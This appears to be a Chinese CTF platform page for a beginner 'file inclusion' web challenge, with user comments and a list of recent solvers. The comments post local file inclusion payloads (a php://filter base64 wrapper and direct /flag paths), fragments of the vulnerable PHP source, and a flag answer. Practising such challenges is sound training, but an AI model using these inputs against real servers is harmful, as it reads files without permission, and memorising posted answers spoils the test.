文件包含WEB 未解决

分数: 20 金币: 2
题目作者: harry
一  血: 不会CTF的麻风
一血奖励: 1金币
解  决: 12640
提  示:
描  述:
flag{}
评论
Tolayxu 1年前

跟南邮ctf一摸一样

回复 0

17344057285 1年前

flag{b8aba5bfc55997b3368ac7b88fe3854f}

回复 0

YUMEKO 1年前

http://xxxxxxxxxxxxx/index.php?file=///flag

回复 2

.⎛⎝•̀ω•́⎠⎞. 1年前

php伪协议的简单利用

回复 0

zh2i 2年前

回复 0
YUMEKO 1年前

过分了,谁都知道是伪协议

回复 0

EtHat 2年前

?file=php://filter/read=convert.base64-encode/resource=index.php

回复 0

bkyhack123 2年前

<?php error_reporting(0); if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';} $file=$_GET['file']; if(strstr($file,"../")||stristr

回复 0

bkyhack123 2年前

<?php error_reporting(0); if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';} $file=$_GET['file']; if(strstr($file,"../")||stristr

回复 0

fonddream 2年前

http://114.67.175.224:18948/index.php?file=php://filter/convert.base64-encode/resource=index.php 得到一串base64编码,解码之后发现是源码,直接有falg

回复 1

大哥大 2年前

http://114.67.175.224:11806/index.php?file=/flag Copy this url then you can get the flag.

回复 2

WriteUp

image
harry

2 金币

评分(11)

解题动态

1293273679 攻破了该题 18小时前
空空如也 攻破了该题 18小时前
xjn12 攻破了该题 18小时前
sdxsdxl 攻破了该题 22小时前
18273414848 攻破了该题 22小时前
JKyukino 攻破了该题 1天前
liberator 攻破了该题 1天前
daimaojiang 攻破了该题 2天前
Oliver23 攻破了该题 2天前
l2 攻破了该题 2天前
dicer 攻破了该题 2天前
yyj 攻破了该题 2天前
NEIL. 攻破了该题 2天前
myj38 攻破了该题 2天前
鄂ANB666 攻破了该题 2天前
kobaikobai 攻破了该题 2天前
2406100127 攻破了该题 2天前
ashYuki 攻破了该题 2天前
LJsir 攻破了该题 2天前
bluesword 攻破了该题 3天前
问题反馈